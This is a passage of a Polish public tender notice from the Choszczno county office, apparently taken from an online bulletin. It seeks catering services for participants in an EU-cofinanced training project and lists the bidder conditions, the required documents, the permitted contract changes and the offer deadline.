6.7.	W przypadku załączenia do oferty innych dokumentów niż wymagane przez Zamawiającego (np. materiałów reklamowych i informacyjnych) zaleca się, aby stanowiły one odrębną część, niezłączoną z ofertą w sposób trwały. Dokumenty takie nie będą podlegały ocenie przez Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy nie podlegają wykluczeniu z postępowania, w okolicznościach, o których mowa w art. 24 ust. 1 ustawy oraz spełniają warunki zawarte w art. 22 ust. 1 ustawy, a dotyczące:
a)	Nie są wykluczeni z postępowania na podstawie przesłanek z wykluczenia z postępowania, określonych w art. 24 ust. 1,2 Prawa Zamówień Publicznych 
b)	Spełniają warunki określone w Art. 22 ust 1 pkt 1-4 Prawa Zamówień Publicznych dotyczące:
-	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
-	posiadania wiedzy i doświadczenia 
-	dysponowania  odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
-	sytuacji ekonomicznej i finansowej
c)	Spełniają następujące warunki szczegółowe w zakresie wiedzy i doświadczenia 

O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali co najmniej 1 usługę polegającą na wyżywieniu osób poza siedzibą Wykonawcy z  podaniem przedmiotu, dat wykonania, odbiorcy i wykonawcy usługi oraz załączeniem dokumentów potwierdzających, ze usługa została wykonana należycie np. referencjami . 
Zamawiający dokona oceny spełniania warunków przez Wykonawców na podstawie załącznika do oferty nr 2.Ocena spełniania warunków przez Wykonawców dokonana zostanie według reguły spełnia - nie spełnia.
W przypadku zaistnienia wątpliwości zamawiający zastrzega sobie prawo do żądania wyjaśnień potwierdzających spełnianie warunków.

VI.    WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW, JAKIE MAJĄ DOSTARCZYĆ  WYKONAWCY W CELU POTWIERDZENIA SPEŁNIENIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU. 

6.1.	W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy do oferty należy załączyć:

Część  od 1 do 4 części:  

a)	Aktualny odpis z właściwego rejestru, (jeżeli odrębne przepisy wymagają wpisu do rejestru), w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania oferty, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy - zgodne z załącznikiem nr 2 do SIWZ.
W przypadku składania oferty wspólnej ww. dokument składa każdy z Wykonawców składających ofertę wspólną. 

b)	Oświadczenie o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia - zgodnie z załącznikiem nr 3 do SIWZ. 
W przypadku składania oferty wspólnej ww. oświadczenie składa każdy z Wykonawców składających ofertę wspólną we własnym imieniu. 

6.2.	W celu wykazania spełnienia przez Wykonawcę warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 ustawy do oferty należy załączyć:
a)	Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - zgodnie z załącznikiem nr 2 do SIWZ. 
W przypadku składania oferty wspólnej ww. oświadczenie składa pełnomocnik w imieniu Wykonawców składających ofertę wspólną.
Dotyczy części 1,2,3,4  zamówienia.

b)	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami, według wzoru, stanowiącego załącznik nr 4 do SIWZ. 
W przypadku składania oferty wspólnej Wykonawcy składają jeden wspólny wykaz osób którymi dysponują lub będą dysponować.
            Dotyczy części 1,2,3,4  zamówienia

c)	 Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia (wymienione w ww. wykazie osób), posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, według wzoru, stanowiącego załącznik nr 4  do SIWZ. 
Dotyczy części 1,2,3,4  zamówienia

6.3.   Dokumenty innych podmiotów:
Stosownie do zapisów art. 26 ust. 2b i 2c ustawy Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 

6.4. 	W przypadku podmiotów, o których mowa w pkt 6.3. przekładane przez Wykonawcę kopie dokumentów dotyczących każdego z tych podmiotów muszą być poświadczone za zgodność z oryginałem przez te podmioty.    

6.5.	Ponadto Wykonawcy mają dołączyć do oferty następujące dokumenty:
1)	  ofertę cenową zgodnie z rozdziałem XV, pkt 15.14.ppkt 1) SIWZ. Wzór oferty cenowej stanowi załącznik nr 1 do SIWZ
W przypadku składania oferty wspólnej należy złożyć jeden dokument;
2)	odpowiednie pełnomocnictwa;
	w przypadku składania oferty wspólnej (Rozdział VII, pkt 7.1. SIWZ);

6.6.	Wykonawca  skład jacy ofertę na więcej niż jedną część zamówienia jest obowiązany złożyć komplet dokumentów i oświadczeń wymaganych przez SIWZ osobno dla każdej części zamówienia. Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożą oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert. 
6.7.	W przypadku załączenia do oferty innych dokumentów niż wymagane przez Zamawiającego (np. materiałów reklamowych i informacyjnych) zaleca się, aby stanowiły one odrębną część, niezłączoną z ofertą w sposób trwały. Dokumenty takie nie będą podlegały ocenie przez Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy nie podlegają wykluczeniu z postępowania, w okolicznościach, o których mowa w art. 24 ust. 1 ustawy oraz spełniają warunki zawarte w art. 22 ust. 1 ustawy, a dotyczące:
a)	Nie są wykluczeni z postępowania na podstawie przesłanek z wykluczenia z postępowania, określonych w art. 24 ust. 1,2 Prawa Zamówień Publicznych 
b)	Spełniają warunki określone w Art. 22 ust 1 pkt 1-4 Prawa Zamówień Publicznych dotyczące:
-	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
-	posiadania wiedzy i doświadczenia 
-	dysponowania  odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
-	sytuacji ekonomicznej i finansowej
c)	Spełniają następujące warunki szczegółowe w zakresie wiedzy i doświadczenia 

O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali co najmniej 1 usługę polegającą na wyżywieniu osób poza siedzibą Wykonawcy z  podaniem przedmiotu, dat wykonania, odbiorcy i wykonawcy usługi oraz załączeniem dokumentów potwierdzających, ze usługa została wykonana należycie np. referencjami . 
Zamawiający dokona oceny spełniania warunków przez Wykonawców na podstawie załącznika do oferty nr 2.Ocena spełniania warunków przez Wykonawców dokonana zostanie według reguły spełnia - nie spełnia.
W przypadku zaistnienia wątpliwości zamawiający zastrzega sobie prawo do żądania wyjaśnień potwierdzających spełnianie warunków.

VI.    WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW, JAKIE MAJĄ DOSTARCZYĆ  WYKONAWCY W CELU POTWIERDZENIA SPEŁNIENIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU. 

6.1.	W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy do oferty należy załączyć:

Część  od 1 do 4 części:  

a)	Aktualny odpis z właściwego rejestru, (jeżeli odrębne przepisy wymagają wpisu do rejestru), w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania oferty, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy - zgodne z załącznikiem nr 2 do SIWZ.
W przypadku składania oferty wspólnej ww. dokument składa każdy z Wykonawców składających ofertę wspólną. 

b)	Oświadczenie o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia - zgodnie z załącznikiem nr 3 do SIWZ. 
W przypadku składania oferty wspólnej ww. oświadczenie składa każdy z Wykonawców składających ofertę wspólną we własnym imieniu. 

6.2.	W celu wykazania spełnienia przez Wykonawcę warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 ustawy do oferty należy załączyć:
a)	Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - zgodnie z załącznikiem nr 2 do SIWZ. 
W przypadku składania oferty wspólnej ww. oświadczenie składa pełnomocnik w imieniu Wykonawców składających ofertę wspólną.
Dotyczy części 1,2,3,4  zamówienia.

b)	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami, według wzoru, stanowiącego załącznik nr 4 do SIWZ. 
W przypadku składania oferty wspólnej Wykonawcy składają jeden wspólny wykaz osób którymi dysponują lub będą dysponować.
            Dotyczy części 1,2,3,4  zamówienia

c)	 Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia (wymienione w ww. wykazie osób), posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, według wzoru, stanowiącego załącznik nr 4  do SIWZ. 
Dotyczy części 1,2,3,4  zamówienia

6.3.   Dokumenty innych podmiotów:
Stosownie do zapisów art. 26 ust. 2b i 2c ustawy Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 

6.4. 	W przypadku podmiotów, o których mowa w pkt 6.3. przekładane przez Wykonawcę kopie dokumentów dotyczących każdego z tych podmiotów muszą być poświadczone za zgodność z oryginałem przez te podmioty.    

6.5.	Ponadto Wykonawcy mają dołączyć do oferty następujące dokumenty:
1)	  ofertę cenową zgodnie z rozdziałem XV, pkt 15.14.ppkt 1) SIWZ. Wzór oferty cenowej stanowi załącznik nr 1 do SIWZ
W przypadku składania oferty wspólnej należy złożyć jeden dokument;
2)	odpowiednie pełnomocnictwa;
	w przypadku składania oferty wspólnej (Rozdział VII, pkt 7.1. SIWZ);

6.6.	Wykonawca  skład jacy ofertę na więcej niż jedną część zamówienia jest obowiązany złożyć komplet dokumentów i oświadczeń wymaganych przez SIWZ osobno dla każdej części zamówienia. Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożą oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert. 
6.7.	W przypadku załączenia do oferty innych dokumentów niż wymagane przez Zamawiającego (np. materiałów reklamowych i informacyjnych) zaleca się, aby stanowiły one odrębną część, niezłączoną z ofertą w sposób trwały. Dokumenty takie nie będą podlegały ocenie przez Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy nie podlegają wykluczeniu z postępowania, w okolicznościach, o których mowa w art. 24 ust. 1 ustawy oraz spełniają warunki zawarte w art. 22 ust. 1 ustawy, a dotyczące:
a)	Nie są wykluczeni z postępowania na podstawie przesłanek z wykluczenia z postępowania, określonych w art. 24 ust. 1,2 Prawa Zamówień Publicznych 
b)	Spełniają warunki określone w Art. 22 ust 1 pkt 1-4 Prawa Zamówień Publicznych dotyczące:
-	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
-	posiadania wiedzy i doświadczenia 
-	dysponowania  odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
-	sytuacji ekonomicznej i finansowej
c)	Spełniają następujące warunki szczegółowe w zakresie wiedzy i doświadczenia 

O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali co najmniej 1 usługę polegającą na wyżywieniu osób poza siedzibą Wykonawcy z  podaniem przedmiotu, dat wykonania, odbiorcy i wykonawcy usługi oraz załączeniem dokumentów potwierdzających, ze usługa została wykonana należycie np. referencjami . 
Zamawiający dokona oceny spełniania warunków przez Wykonawców na podstawie załącznika do oferty nr 2.Ocena spełniania warunków przez Wykonawców dokonana zostanie według reguły spełnia - nie spełnia.
W przypadku zaistnienia wątpliwości zamawiający zastrzega sobie prawo do żądania wyjaśnień potwierdzających spełnianie warunków.

VI.    WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW, JAKIE MAJĄ DOSTARCZYĆ  WYKONAWCY W CELU POTWIERDZENIA SPEŁNIENIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU. 

6.1.	W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy do oferty należy załączyć:

Część  od 1 do 4 części:  

a)	Aktualny odpis z właściwego rejestru, (jeżeli odrębne przepisy wymagają wpisu do rejestru), w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania oferty, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy - zgodne z załącznikiem nr 2 do SIWZ.
W przypadku składania oferty wspólnej ww. dokument składa każdy z Wykonawców składających ofertę wspólną. 

b)	Oświadczenie o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia - zgodnie z załącznikiem nr 3 do SIWZ. 
W przypadku składania oferty wspólnej ww. oświadczenie składa każdy z Wykonawców składających ofertę wspólną we własnym imieniu. 

6.2.	W celu wykazania spełnienia przez Wykonawcę warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 ustawy do oferty należy załączyć:
a)	Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - zgodnie z załącznikiem nr 2 do SIWZ. 
W przypadku składania oferty wspólnej ww. oświadczenie składa pełnomocnik w imieniu Wykonawców składających ofertę wspólną.
Dotyczy części 1,2,3,4  zamówienia.

b)	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami, według wzoru, stanowiącego załącznik nr 4 do SIWZ. 
W przypadku składania oferty wspólnej Wykonawcy składają jeden wspólny wykaz osób którymi dysponują lub będą dysponować.
            Dotyczy części 1,2,3,4  zamówienia

c)	 Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia (wymienione w ww. wykazie osób), posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, według wzoru, stanowiącego załącznik nr 4  do SIWZ. 
Dotyczy części 1,2,3,4  zamówienia

6.3.   Dokumenty innych podmiotów:
Stosownie do zapisów art. 26 ust. 2b i 2c ustawy Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 

6.4. 	W przypadku podmiotów, o których mowa w pkt 6.3. przekładane przez Wykonawcę kopie dokumentów dotyczących każdego z tych podmiotów muszą być poświadczone za zgodność z oryginałem przez te podmioty.    

6.5.	Ponadto Wykonawcy mają dołączyć do oferty następujące dokumenty:
1)	  ofertę cenową zgodnie z rozdziałem XV, pkt 15.14.ppkt 1) SIWZ. Wzór oferty cenowej stanowi załącznik nr 1 do SIWZ
W przypadku składania oferty wspólnej należy złożyć jeden dokument;
2)	odpowiednie pełnomocnictwa;
	w przypadku składania oferty wspólnej (Rozdział VII, pkt 7.1. SIWZ);

6.6.	Wykonawca  skład jacy ofertę na więcej niż jedną część zamówienia jest obowiązany złożyć komplet dokumentów i oświadczeń wymaganych przez SIWZ osobno dla każdej części zamówienia. Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożą oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert. 
6.7.	W przypadku załączenia do oferty innych dokumentów niż wymagane przez Zamawiającego (np. materiałów reklamowych i informacyjnych) zaleca się, aby stanowiły one odrębną część, niezłączoną z ofertą w sposób trwały. Dokumenty takie nie będą podlegały ocenie przez Zamawiającego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>21.2.	Zamawiający przewiduje możliwość zmian istotnych postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia. 

a)	zmiana terminu wykonania zamówienia w przypadku zmiany umowy o dofinansowanie projektu pn. Nie trać czasu -załóż własną firmę, spełniaj się zawodowo! III zawartej przez Powiat Choszczeński Starostwo Powiatowe  nr umowy UDA-POKL.06.02.00-32-018 12-00. 
Powyższa zmiana umowy może zostać dokonana pod warunkiem przedłożenia Zamawiającemu pisemnego uzasadnienia konieczności wprowadzenia zmiany oraz wyrażenia zgody przez Zamawiającego na tę zmianę. 
b)	zmiana okresu realizacji umowy jest możliwa w przypadku zmian w projekcie;
c)	zmniejszenie wartości umowy jest możliwe w przypadku zmian w projekcie;
d)	w przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu Stron umowy;
e)	w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, możliwa jest zmiana postanowień umowy. 
Pozostałe zmiany:
a)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
b)	zmiana obowiązującej stawki VAT. 
-	jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający nie dopuszcza możliwości zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez Wykonawcę;
-	jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez Wykonawcę.
-	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami;

21.3.	Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. 
21.4.	Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy:
a)	zmiana danych związanych z obsługą administracyjno - organizacyjną umowy (np. zmiana nr rachunku bankowego);
b)	zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami;
c)	udzielenie zamówień dodatkowych określonych w przepisach o zamówieniach publicznych;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spow.choszczno.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiat Choszczeński-Starostwo Powiatowe w Choszcznie ul. Nadbrzeżna 2, 73-200 Choszczno w godzinach pracy urzędu pokój nr 207 II piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.01.2013 godzina 10:00, miejsce: Powiat Choszczeński-Starostwo Powiatowe w Choszcznie Kancelaria Ogólna ul. Nadbrzeżna 2, 73-200 Choszczno.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego
Działania 6.2 PO KL realizowanego przez Powiat Choszczeński  Starostwo Powiatowe
Nr umowy o dofinansowanie UDA-POKL.06.02.00-32-018-12-00.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usługi cateringowej dla uczestników projektu podczas  zajęć szkoleniowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część  Nr 1 Świadczenie usługi cateringowej dla uczestników projektu podczas  zajęć szkoleniowych  
